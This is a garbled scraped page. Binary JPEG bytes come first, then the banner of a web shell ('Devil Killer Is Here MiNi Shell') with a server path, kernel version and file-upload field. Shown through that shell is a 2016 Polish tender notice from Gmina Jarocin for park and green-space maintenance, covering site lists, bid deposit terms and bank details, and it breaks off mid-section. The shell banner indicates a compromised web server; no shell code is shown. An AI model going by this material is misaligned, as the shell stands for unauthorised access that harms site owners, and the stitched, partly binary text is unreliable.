JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160201/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20160201/10769-N-2016.html

<p class="kh_header"><b>Jarocin: Utrzymanie i pielęgnacja zieleni na terenie Gminy Jarocin 
w roku 2016</b><br>
<b>Numer ogłoszenia: 10769 - 2016; data zamieszczenia: 01.02.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Jarocin , Al. Niepodległości 10, 63-200 Jarocin, woj. wielkopolskie, tel. 62 7499500, faks 62 7472225.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.jarocin.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Utrzymanie i pielęgnacja zieleni na terenie Gminy Jarocin 
w roku 2016.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest utrzymanie terenów zieleni na terenie Gminy Jarocin zgodnie z poniższymi zapisami:
1) Zieleń na terenie miasta Jarocin:
a)  utrzymanie i pielęgnacja trawników oraz terenów zieleni - ok. 16,5 ha, (standard  i lokalizacja zgodnie z załącznikiem nr 1 do Umowy), 
b) 	usuwanie odrostów przy drzewach z dolnych części pnia,
c)	utrzymanie czystości na terenach zielonych (sprzątanie odpadów z trawników i terenów porośniętych krzewami z częstotliwością przynajmniej 2 razy w tygodniu, tj. poniedziałek i piątek), 
d) 	wiosenne i jesienne wygrabianie liści, itp.,
e)  	obcinka żywopłotów (standard i lokalizacja zgodnie z załącznikiem nr 1 do Umowy),
f) 	odchwaszczanie żywopłotów i skupisk krzewów z częstotliwością przynajmniej raz  w miesiącu,
g) 	usuwanie chwastów przy krawężnikach wzdłuż dróg gminnych 
z częstotliwością przynajmniej raz w miesiącu,

WYKAZ TERENÓW ZIELENI W MIEŚCIE JAROCIN
L.p.	Standard	Lokalizacja	Powierzchnia w/m2
1.	I	Aleja Niepodległości:
- zieleń od Jaromy do wiaduktów kolejowych, 
   w tym ul. Zaciszna do JLA
- skarpy wzdłuż Al. Niepodległości
- zieleń od ul. Moniuszki do ul. Wojska Polskiego
   w tym trawniki  przed apteką (narożnik Moniuszki i Sienkiewicza)	5.000
2.	
I	ul. Poznańska:
- zieleń od ul. Kasztanowej do stacji benzynowej
- trawnik przy skrzyżowaniu ul. Poznańskiej z łącznikiem Kasztanowa - Poznańska	
6.000
3.	I	ul. Św. Ducha:
- trawniki od ul. Parkowej do ul. Sportowej
- rozjazd ul. Św. Ducha i Żerkowskiej
- zieleń od ul. Jarmarcznej do wjazdu na stacje paliw	
3.000
4.	I	Teren rekreacyjno-sportowy przy ul. Kasprzaka	500
5.	II	Osiedle 700-lecia:
- zieleń wzdłuż ul. Maratońskiej i Wrzosowej 
  od ul. Okrężnej do ul. Do Zdroju
- zieleń przy ul. Harcerskiej - (I standard)
- zieleń przy ul. Żwirki i Wigury - (I standard)
- zieleń przy ul. Śniadeckich - (I standard)
- ul. Okrężna od ul. Maratońskiej do 
ul. Żerkowskiej
- plac zabaw wraz z boiskami przy 
ul. Maratońskiej	15.000
6.	
I	ul. Wojska Polskiego:
- zieleń wzdłuż ul. Wojska Polskiego od ul. Kasztanowej do ul. Powstańców Wlkp.
- skarpa przy kościele Św. Marcina
- skarpy wzdłuż Lipinki od ul. Św. Ducha do 
ul. Śródmiejskiej 
- łączka przy  Straży Pożarnej
Uwaga:
Skwer z Glanem - sprzątanie codziennie, nawożenie iglaków i traw, pielenie chwastów 
w nasadzeniach, podlewanie w okresie suszy drzew, krzewów i traw.	
17.800
7.	I	ul . Powstańców Wlkp.
- odcinek od ronda do ul. Wrocławskiej po stronie
nowego chodnika
- rondo i zieleń wokół ronda	4.300
8.	
I	trawnik przy parkingu
 - rozjazd ul. Wojska Polskiego i ul. Śródmiejskiej	
2.500
9.	II	drogi dojazdowe do ulic: Gorzeńskiego, Taczaka, Kirchnera	1.000
10.	II	tereny wokół oraz zbiornik wód opadowych przy 
ul. Batorego	20.000
12.	II	ul. Kwiatowa i ul. Słoneczna, tereny przy torze gnieźnieńskim	2.200
13.	
II	osiedle Kopernika:
- ul. Cicha, boisko oraz tereny przy boiskach
- przejście przez tor przy ul. Matejki
- ul. Marcinkowskiego	4.000
14.	I	- ul. Sportowa	800
15.	I	- ul  Szpitalna	200
16.	I	- ul. Zamkowa	200
17.	I	- ul. Przemysłowa	1000
18.	I	- ul. Parkowa	200
19.	II	- ul. Glinki, ul. Leszczyce i ul. Zapłocie (zieleń w pasie drogowym), ul. Jarmarczna	15.200
20.	I	ul. Wrocławska:
- zieleń od ul. Dąbrowskiego do ul. Powstańców   Wlkp.
- zieleń wzdłuż Lipinki
- Plac Klinkowskiego
- Cmentarz Choleryków

12.100
21.	II	ul. Węglowa	1.500
22.	II	ul. Skłodowskiej (w tym tereny przy ALDI), 
ul. Serafina Niedbały, ul. Popiełuszki 
i ul. Solidarności	4.700
23.	II	osiedle Ługi:
- ul. Wielkopolska
- ul. Ługi + łąka
- ul. Warciana (plac przy przepompowni)
- ul. Dnieprowa
- ul. Dunajecka + boisko
- ul. Świętokrzyska
- ul. Prośniana + odnogi
- ul. Brdowa
- ul. Wiślana
- ul. Nyska
- ul. Lutyńska
- ul. Warciana
- ul. Folwarczna 
- ul. Tatrzańska 	30.200

24.	II	osiedle Tumidaj:
- plac przy ul. Sobieskiego
- ul. Leśna
- ul. Prądzyńskiego
- plac na tyłach ul. Poniatowskiego
- ul. Mieszka I	5.700
25.	II	osiedle przy ul. Polnej:
- ul. Łanowa
- ul. Rolna
- ul. Żniwna
- ul. Zagonowa
- ul. Gajowa
- ul. Zagrodowa
- łąka przy ul. Zagonowej     
- boisko przy ul. Zagonowej (I standard)
- ul. Opłotki 
- ul. Drogi dojazdowe do Osiedla Rzeczpospolitej i Bajkowego	10.000
26.	I	ul. Libercourt	800
27.	I	ul. Moniuszki	1.200
28.	I	ul. Sienkiewicza	500
29.	I	parking przy ul. Kościuszki	300
30.	I	ul. Kasztanowa i działka przy ul. Do Zdroju, na której znajduje się plac zabaw	700
RAZEM	166.600 m2

Standard I 	- trawa utrzymana w granicach od 5-10 cm
Standard II 	- koszenie przynajmniej trzy razy w sezonie lecz wysokość trawy nie może   przekraczać 20 cm
Lokalizacja żywopłotów i skupin krzewów na terenie miasta Jarocin
    1. al. Niepodległości (przed i za wiaduktami) 				- 61 mb
    2. ul. Wrocławska								- 305 mb
    3. ul. Wojska Polskiego  							- 40 mb
    4. rozjazd ul. Żerkowska i ul. Św. Ducha  				- 10 mb
    5. ul. T. Kościuszki od ul. Poznańskiej do al. Niepodległości 		- 263 mb
    6. ul. T. Kościuszki przy NETTO 						- 40 mb
    7. ul. Moniuszki od ulicy Poznańskiej do al. Niepodległości 		- 138 mb
    8. ul. Moniuszki przy Przedszkolu Jarzębinka 			             - 60 mb
    9. krzewy przy ul. Szpitalnej (przy ul. Śródmiejskiej)			- 10 m2
  11. krzewy przy ulicy Żwirki i Wigury oraz przy ul. Śniadeckich 	- 10 m2
  12. krzewy przy narożniku ulic Poznańskiej i Kasztanowej 	- 20 m2
  13. krzewy przy ul. Wyszyńskiego	- 20 m2

 Standard dla żywopłotów to: odrosty nie mogą przekroczyć 10 cm.                                

2) Zieleń na terenach wiejskich Gminy Jarocin:
a) 	utrzymanie i pielęgnacja trawników oraz terenów zieleni - ok. 12,8 ha - koszenie  przynajmniej 3 razy w sezonie, trawa nie może przekroczyć 20 cm wysokości  (lokalizacja zgodnie z załącznikiem nr 2 do Umowy),
b) 	usuwanie odrostów przy drzewach z dolnych części pnia,
c)	utrzymanie czystości na terenach zielonych (sprzątanie odpadów z trawników 
i terenów porośniętych krzewami z częstotliwością przynajmniej raz w tygodniu, wiosenne i jesienne wygrabianie liści),
d)	obcinka żywopłotów - minimum 3 razy w sezonie (lokalizacja zgodnie 
z załącznikiem nr 2 do Umowy).

WYKAZ TERENÓW ZIELENI W GMINIE JAROCIN
L.p.	LOKALIZACJA 	Powierzchnia 
w m2
1.	Mieszków
- wjazd do Mieszkowa od strony Jarocina
- Rynek w Mieszkowie
- teren przy placu zabaw
- przy parkingu za Kościołem     
          	12.500
2.	Radlin
- teren wokół sali                                             
- przystanki i skrzyżowania      
- skwer przy kościele                       	6.000
3.	Cielcza
- teren przy boisku                                           
- Topoliki  
- ul. Szkolna
- teren przy sali 
- ul. Jarocińska przy sali 
- ul. Nowa i ul. Sienkiewicza                                                 	15.000
4.	Dąbrowa
- teren przy sali	2.000
5.	Łuszczanów
- Park                                                                
- teren przy sali
- plac zabaw                                                  	5.000
6.	Tarce
- przy drodze na Wilkowyje	2.500
7.	Roszków
- tereny przy boisku                                              
- teren przy kościele                                              
- skrzyżowanie i przystanek przy drodze do Jarocina
- pas zieleni przy drodze asfaltowej przez wieś	8.000

8.	Roszkówko
- przy sklepie	300
9.	Witaszyczki
- teren przy sali wiejskiej
- ścieżka rowerowa od ronda do Witaszyc	5.000
10.	Zakrzew
- staw
- plac zabaw
- przy nowym boisku	5.000
11.	Golina
- łąki przy drodze krajowej
- teren wokół sali
- ul. Sportowa
- ul. Słoneczna
- ul. Mostowa
- ul. Ks. Szczepana Toboły
- ul. Kręta
- ul. Tysiąclecia wraz z działka, na której znajduje się plac   
   zabaw	11.000
12.	Potarzyca
- teren wokół sali	3.800
13.	Prusy
- teren przy świetlicy
- trójkąt przy szkole	2.000
14.	 Witaszyce:
al. Wolności:
- zieleń od ul. Roszarniczej do ul. Kolejowej
- zieleń od ul. Kolejowej do przystanku JLA
- zieleń od ul. Leśnej do ul. Słupskiej
- zieleń przy pomniku
- łąka na terenach po byłych stawach
- łąka przy ul. Kniewskiego
- od ul. Słowackiego do Leśnej
- ul. Słowackiego
- ul. Sienkiewicza plac zabaw
- ul. Leśna	47.000
15.	Wilkowyja:
- przy Sali
- zieleń przy ul. Iwaszkiewicza
- zieleń przy ul. Dębowej	
3.500
RAZEM	128.600 m2
         
Lokalizacja żywopłotów
1.	Witaszyce								- 1.200 mb
2.	Zakrzew								        - 173 mb
3.	Łuszczanów								- 75 mb
4.	Tarce									- 30 mb
5.	Mieszków przy drodze nr 11 i przy szkole		- 200 mb
6.	Radlin (obok sali) 							- 100 mb 
7.	Cielcza (przy placu zabaw) 					- 100 mb
				Razem	:				        - 1.878 mb

3) Park Zwycięstwa w Jarocinie:
a) 	utrzymanie i pielęgnacja trawników - ok. 0,2 ha (koszenie - wysokość trawy nie może przekroczyć 5 - 10 cm), 
b)  	wiosenne i jesienne wygrabianie liści,
c) 	zamiatanie chodników z częstotliwością zapewniającą czystość i bezpieczeństwo dla użytkowników (minimum 3 razy w tygodniu, tj. poniedziałek, środa, piątek),
d) 	utrzymanie czystości na trawnikach (sprzątanie odpadów z trawników 
z częstotliwością zapewniającą czystość i bezpieczeństwo dla użytkowników (minimum 3 razy w tygodniu, tj. poniedziałek, środa, piątek),
e) 	prace inne, tj. dodatkowe prace porządkowe, naprawie ławek i koszy parkowych,
f) 	mycie ławek i koszy (przynajmniej raz w miesiącu),
g) 	usuwanie suchych zagrażających konarów,
h) 	informowanie o powstałych zniszczeniach w wyniku aktów wandalizmu.

4) Park leśny przy ulicy Wrocławskiej w Jarocinie:
a) 	utrzymanie i pielęgnacja trawników - ok. 0,45 ha  (koszenie - wysokość trawy nie może przekroczyć 5 - 10 cm), 
b) 	wiosenne i jesienne wygrabianie liści, 
c) 	zamiatanie chodników z częstotliwością zapewniającą czystość i bezpieczeństwo dla użytkowników (minimum 3 razy w tygodniu, tj. poniedziałek, środa, piątek),
d)	zamiatanie i wygrabianie terenu wokół ławek i koszy parkowych  z częstotliwością zapewniającą czystość (minimum 3 razy w tygodniu, tj. poniedziałek, środa, piątek),
e) 	utrzymanie czystości na całym terenie Parku (sprzątanie odpadów z terenów zielonych z częstotliwością zapewniającą czystość i bezpieczeństwo dla użytkowników (minimum 3 razy w tygodniu, tj. poniedziałek, środa, piątek),
f) 	utrzymanie czystości i porządku na placu zabaw (minimum 3 razy w tygodniu, tj. poniedziałek, środa, piątek), 
g) bieżące utrzymanie czystości na stawie i w cieku Lipinka (odławianie            odpadów, odblokowywanie zatorów, itp.),
h) 	prace inne, tj. dodatkowe prace porządkowe, naprawie ławek i koszy parkowych,
i) 	usuwanie suchych zagrażających konarów, 
j) 	informowanie o powstałych zniszczeniach w wyniku aktów wandalizmu,
k) 	mycie ławek i koszy (przynajmniej raz w miesiącu),
l) 	w okresie zimowym - bieżące odśnieżanie i posypywanie piaskiem alei parkowych oraz schodów.

5) Park przy Sanktuarium w Golinie:
a) 	utrzymanie i pielęgnacja trawników - ok. 0,6  ha  (koszenie - wysokość trawy nie może przekroczyć  5 - 10 cm), 
b) 	wiosenne i jesienne wygrabianie liści,
c) 	cięcie i pielęgnacja krzewów, pielenie chwastów (minimum 3 razy w sezonie),
d) 	bieżące pielenie terenów porośniętych bylinami i roślinami cebulowymi,
e) 	kontrola nawadniania (włączanie, wyłączanie, ustawianie i regulacja),
f) 	zamiatanie chodników i usuwanie z nich chwastów (minimum 2 razy w tygodniu, tj. poniedziałek, piątek), 
g) 	zbieranie odpadów z całego terenu (minimum 2 razy w tygodniu, tj. poniedziałek, piątek),
h) 	usuwanie suchych zagrażających konarów,
i) 	mycie i konserwacja koszy parkowych, ławek i tabliczek mosiężnych (przynajmniej raz w miesiącu),
j) 	bieżące oczyszczanie stawu i strumienia,
k) 	konserwacja pompy, lamp oświetleniowych,
l) 	informowanie o powstałych zniszczeniach w wyniku aktów wandalizmu.

6) Skwer przy ul. Stawnej w Witaszycach wraz z placem zabaw:
a) 	utrzymanie i pielęgnacja trawników - ok. 0,4  ha  (koszenie - wysokość trawy nie może przekroczyć  5 - 10 cm), 
b) 	wiosenne i jesienne wygrabianie liści,
c) 	cięcie i pielęgnacja krzewów (minimum 3 razy w sezonie),
d) 	bieżące pielenie terenów porośniętych krzewami, bylinami,
e) 	oczyszczanie alejek i usuwanie z nich chwastów (minimum 2 razy w tygodniu, tj. poniedziałek, piątek),
f) 	usuwanie suchych zagrażających konarów,
g) 	zbieranie odpadów z całego terenu (minimum 2 razy w tygodniu, tj. poniedziałek, piątek),
h) 	mycie i konserwacja koszy parkowych, ławek (przynajmniej raz w miesiącu),
i) 	informowanie o powstałych zniszczeniach w wyniku aktów wandalizmu.

7) Pielęgnacja, nasadzenia i wycinka drzew:
a)	pielęgnacja koron (korekta, podcinka, redukcja koron, poprawa statyki, usunięcie suchych konarów) - szacunkowa ilość 800 szt.
b)	wycinka drzew (uporządkowanie terenu po wycince, wywóz pozyskanego drewna na magazyn gminny w Cielczy - szacunkowa ilość 50 szt. (wymiary 40-300 cm w obwodzie),
c)	frezowanie pni (redukcja pnia do 0,5 m poniżej gruntu, wywóz trocin, odtworzenie chodników i pasów drogowych, zasypanie dołu humusem i zagęszczenie) - szacunkowa ilość 50 szt.
d)	nasadzenie drzew (obwód 12-14 cm mierzony w pierśnicy, opalikowanie 
i otaśmowanie) - szacunkowa ilość 100 szt.

8) Nasadzenia i pielęgnacja kwiatów szacunkowa ilość 3.000 szt.
a)	nasadzenie kwiatów - pelargonia (sadzonka minimum 5 pędów o długości nie mniejszej niż 25 cm), w donicach na okna Ratusza i balkony Urzędu Miejskiego, wieże kwiatowe na Rynku i przy ul. Żwirki i Wigury oraz w lokalizacjach na terenie Gminy Jarocin wskazanych przez Zamawiającego,
b)	bieżące utrzymanie (dbałość o kompletność nasadzenia, odchwaszczanie, spulchnianie, podlewanie, zasilanie nawozami i stosowanie środków chemicznych na szkodniki w razie ich występowania),
c)	utrzymanie czystości oraz usunięcie sadzonek po sezonie.

2.	Odpady zebrane i wytworzone podczas wykonywania przedmiotu zamówienia, tj. odpady komunalne zmieszane należy dostarczyć do ZZO z siedzibą Witaszyczki 1a, 63-200 Jarocin.
3.	Odpady zebrane i wytworzone podczas wykonywania przedmiotu zamówienia, tj. odpady ulegające biodegradacji należy dostarczyć do ZZO z siedzibą Witaszyczki 1a, 63-200 Jarocin.
4.	Wykonawca zobowiązuje się do wykonania prac będących przedmiotem umowy zgodnie z aktualnym poziomem wiedzy technicznej, należytą starannością i w oparciu o obowiązujące normy, a także na podstawie SIWZ oraz oferty Wykonawcy, która stanowi integralną część umowy..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 77.00.00.00-0, 77.31.00.00-6, 77.34.20.00-9, 77.31.30.00-7.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2016.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.	Wysokość wadium (przepisy art. 45. PZP).
 Zamawiający ustalił wysokość wadium w kwocie 7.500,00 zł (słownie: siedem tysięcy pięćset złotych, 00/100). Wykonawca zobowiązany jest wnieść wadium przed upływem terminu składania ofert.
2.	Forma wadium.
Wadium może być wniesione w następujących formach:
a)	pieniądzu;
b)	poręczeniach bankowych lub poręczeniach spółdzielczej kasy  oszczędnościowo-kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym;
c)	gwarancjach bankowych;
d)	gwarancjach ubezpieczeniowych;
e)	poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości.
W przypadku składania przez Wykonawcę wadium w formie gwarancji, gwarancja ma być, co najmniej gwarancją nieodwołalną i płatną na pierwsze pisemne żądanie Zamawiającego.
3.	Miejsce i sposób wniesienia wadium:
3.1	Wadium wnoszone w pieniądzu należy wpłacić przelewem na rachunek bankowy na nr konta: 91 1090 1131 0000 0000 1300 1942 z dopiskiem Wadium w przetargu nieograniczonym na Utrzymanie i pielęgnację zieleni na terenie Gminy Jarocin w roku 2016.
3.2	Zamawiający, wymaga by wadium wnoszone w innych formach niż 
w pieniądzu, a dopuszczonych do wniesienia zgodnie z ustawą Pzp, było złożone w oryginale w siedzibie Zamawiającego, pok. nr 57 - przed upływem terminu składania ofert. Złożenie oryginału dokumentu potwierdzającego wniesienie wadium w innych formach niż pieniądz, o którym mowa 
w niniejszym punkcie jest wymagane jako warunek konieczny.
3.3	Zaleca się, by do oferty dołączyć kopię dokumentu potwierdzającego wniesienie wadium, tzn. potwierdzoną przez Wykonawcę za zgodność 
z oryginałem, kopię polecenia przelewu na konto Zamawiającego lub potwierdzoną przez Wykonawcę za zgodność z oryginałem, kopię dokumentu będącego każdą inną formą wadium dopuszczoną przez Zamawiającego.
Załączenie w/w kopii do oferty, o których mowa w niniejszym punkcie jest pożądane, lecz nie jest to warunek konieczny.
4.	Termin wniesienia wadium
Wadium należy wnieść przed upływem terminu składania ofert, przy czym wniesienie wadium w pieniądzu za pomocą przelewu bankowego Zamawiający będzie uważał za skuteczne tylko wówczas, gdy bank prowadzący rachunek Zamawiającego potwierdzi, że otrzymał taki przelew przed upływem terminu składania ofert.
5.	Zwrot wadium
5.1.	Zamawiający zwraca wadium wszystkim wykonawcom niezwłocznie po wyborze oferty najkorzystniejszej lub unieważnieniu postępowania, 
z wyjątkiem wykonawcy, którego oferta została wybrana jako najkorzystniejsza.
5.2.	Wykonawcy, którego oferta została wybrana jako najkorzystniejsza, Zamawiający zwraca wadium niezwłocznie po zawarciu umowy w sprawie zamówienia publicznego oraz wniesieniu zabezpieczenia należytego wykonania umowy.
5.3.	Zamawiający zwraca niezwłocznie wadium na wniosek wykonawcy, który wycofał ofertę przed upływem terminu składania ofert.
5.4.	Zamawiający żąda ponownego wniesienia wadium przez wykonawcę, któremu zwrócono wadium w przypadku, o którym mowa w ppkt 1, jeżeli 
w wyniku rozstrzygnięcia odwołania jego oferta została wybrana jako najkorzystniejsza. Wykonawca wnosi wadium w terminie określonym przez zamawiającego.
5.5.	W pozostałych sprawach dotyczących zwrotu wadium, nieuregulowanych 
w niniejszym dziale SIWZ, mają zastosowanie przepisy ustawy Pzp.
6.	Utrata wadium
6.1.	Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli wykonawca 
w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3, z przyczyn leżących po jego stronie, nie złożył dokumentów lub oświadczeń, o których mowa w art. 25 ust. 1, pełnomocnictw, listy podmiotów należących do tej samej grupy kapitałowej, o której mowa w art. 24 ust. 2 pkt 5, lub informacji 
o tym, że nie należy do grupy kapitałowej, lub nie wyraził zgody na poprawienie omyłki, o której mowa w art. 87 ust. 2 pkt 3, co powodowało brak możliwości wybrania oferty złożonej przez wykonawcę jako najkorzystniejszej.
6.2.	Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli wykonawca, którego oferta została wybrana:
a)	odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie;
b)	nie wniósł wymaganego zabezpieczenia należytego wykonania umowy;
c)	zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po stronie wykonawcy</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający odstępuje od opisu sposobu dokonywania oceny spełniania w/w warunku. 
Zamawiający uzna ten warunek za spełniony, jeżeli Wykonawca przedłoży oświadczenie sporządzone według wzoru stanowiącego załącznik nr 2 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony jeśli Wykonawca w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy w tym okresie wykonał minimum jedną usługą związaną z utrzymaniem zieleni miejskiej o wartości minimum 100.000,00 zł brutto.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
